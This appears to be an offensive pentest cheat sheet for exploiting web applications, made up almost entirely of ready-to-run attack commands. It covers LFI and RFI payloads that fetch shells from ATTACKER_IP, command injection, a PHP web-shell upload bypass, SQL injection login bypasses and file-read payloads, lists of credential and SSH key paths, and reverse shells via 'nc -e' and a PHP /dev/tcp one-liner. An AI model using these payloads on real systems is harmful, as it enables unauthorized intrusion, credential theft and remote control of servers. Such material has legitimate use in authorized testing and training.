Exploiting Web Apps

# Step 1: Identify tech stack
whatweb http://<IP>
curl -I http://<IP>
curl http://<IP> | grep -iE "php|html|js|admin|version"

# Step 2: Directory brute-forcing
ffuf -u http://<IP>/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.txt,.bak

# Brute-force with recursion and longer list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -u http://<IP>/FUZZ/ -recursion

# Step 3: Search for common entry points
curl http://<IP>/robots.txt
curl http://<IP>/sitemap.xml

# Step 4: LFI checks
curl "http://<IP>/index.php?page=../../../../etc/passwd"
curl "http://<IP>/index.php?page=../../../../etc/passwd%00"
curl "http://<IP>/index.php?page=php://filter/convert.base64-encode/resource=index"
curl "http://<IP>/index.php?page=/var/log/apache2/access.log"

# Step 5: RFI checks (if allow_url_include=On)
curl "http://<IP>/index.php?page=http://ATTACKER_IP/shell.txt"

# Step 6: SSTI checks
curl "http://<IP>/?name={{7*7}}"
curl "http://<IP>/?q=<%= 7*7 %>"

# Step 7: Command injection
curl "http://<IP>/ping?host=127.0.0.1;id"
curl "http://<IP>/ping?host=127.0.0.1|whoami"
curl "http://<IP>/ping?host=$(id)"

# Blind command injection (use timing)
curl "http://<IP>/ping?host=127.0.0.1; sleep 5" -w "%{time_total}\n"

# Step 8: Bypass file upload filters
curl -F "file=@shell.php" http://<IP>/upload.php
mv shell.php shell.php.jpg
mv shell.php shell.pHp5
curl -F "file=@shell.pHp5" http://<IP>/upload.php

# Trigger uploaded shell
curl http://<IP>/uploads/shell.php?cmd=id

# Step 9: Bypass login page
curl -X POST -d "user=admin' -- &pass=x" http://<IP>/login.php
curl -X POST -d "user=admin&pass=' or 1=1 -- -" http://<IP>/login.php

# Step 10: Exploit vulnerable parameter
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://<IP>/?FUZZ=whoami

# Step 11: Expose headers, cookies, hidden fields
curl -I http://<IP>
curl -s http://<IP>/ | grep -iE "Set-Cookie|csrf|token|auth"

# Step 12: Crawl site to discover endpoints
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,zip

# Step 13: Test admin panels / login
curl http://<IP>/admin/
curl http://<IP>/login.php
curl http://<IP>/wp-login.php

# Step 14: Look for backup/config files
curl http://<IP>/.git/config
curl http://<IP>/config.php.bak
curl http://<IP>/index.php~

# Step 15: Grab initial shell via web-based RCE
curl http://<IP>/rce.php?cmd=nc+-e+/bin/bash+ATTACKER_IP+PORT

# Step 16: After shell, upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z → `stty raw -echo; fg`
export TERM=xterm

'
)'
"
`
')
")
`)
'))
"))
`))
'-SLEEP(30); #

# Both user and password or specific username and payload as password

' or 1=1 --
' or '1'='1
' or 1=1 --+
user' or 1=1;#
user' or 1=1 LIMIT 1;#
user' or 1=1 LIMIT 0,1;#

order by 1
2 ' UNION SELECT 1,2,3 -- -
3 ' UNION SELECT 1,@@version,3 -- -
4 ' UNION SELECT 1,user(),3 -- -
5 ' UNION SELECT 1,load_file('/etc/passwd'),3 -- -
6 ' UNION SELECT 1,load_file(0x2f6574632f706173737764),3 -- - //hex encod
7
8 ' UNION SELECT 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100))
9 ,3 -- - // char encode

'; WAITFOR DELAY '00:00:30'; --

# interesting Files
/etc/passwd # get username from here
/etc/shadow
/etc/issue
/etc/group
/etc/hostname

# SSH keys
/home/<username>/.ssh/id_rsa # or id_ecdsa, id_ecdsa_sk, id_ed25519, id_ed25519_sk, id_dsa

# Log Files
## Apache access log:
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/httpd/error_log
/var/log/cron.log
/var/log/secure or /var/log/auth.log

# CMS Config Files
WordPress: /var/www/html/wp-config.php
Joomla: /var/www/configuration.php
Dolphin CMS: /var/www/html/inc/header.inc.php
Drupal: /var/www/html/sites/default/settings.php
Mambo: /var/www/configuration.php
PHPNuke: /var/www/config.php
PHPbb: /var/www/config.php

# user specific
.bash_history
.mysql_history
.my.cnf

C:/Windows/System32/drivers/etc/hosts

# interesting file may contain passwords
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/Panther/Unattend.txt
C:/Unattend.xml
C:/Autounattend.xml
C:/Windows/system32/sysprep
C:/inetpub/wwwroot/
C:/inetpub/wwwroot/web.config
C:/inetpub/logs/logfiles/

C:/documents and settings/administrator/desktop/desktop.ini
C:/documents and settings/administrator/ntuser.dat
C:/documents and settings/administrator/ntuser.ini
C:/users/administrator/desktop/desktop.ini
C:/users/administrator/ntuser.dat
C:/users/administrator/ntuser.ini
C:/windows/windowsupdate.log

# SSH private keys
C:/Users/<username>/.ssh/id_rsa

# XAMPP
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/tomcat/conf/web.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webdav/webdav.txt
C:/xampp/apache/bin/php.ini
C:/xampp/apache/conf/httpd.conf

# logs
c:\Program Files\Apache Group\Apache\logs\access.log  
c:\Program Files\Apache Group\Apache\logs\error.log

# fingerprinting
c:\WINDOWS\system32\eula.txt
c:\boot.ini  
c:\WINDOWS\win.ini  
c:\WINNT\win.ini  
c:\WINDOWS\Repair\SAM  
c:\WINDOWS\php.ini  
c:\WINNT\php.ini  
c:\Program Files\Apache Group\Apache\conf\httpd.conf  
c:\Program Files\Apache Group\Apache2\conf\httpd.conf  
c:\Program Files\xampp\apache\conf\httpd.conf  
c:\php\php.ini  
c:\php5\php.ini  
c:\php4\php.ini  
c:\apache\php\php.ini  
c:\xampp\apache\bin\php.ini  
c:\home2\bin\stable\apache\php.ini  
c:\home\bin\stable\apache\php.ini

# Example
http://exampe.com/index.php?page=http://attackerserver.com/evil.txt

# Evil looks like this
<?php echo shell_exec("whoami");?>

# Or just get a reverse shell directly like this:
<?php echo system("0<&196;exec 196<>/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>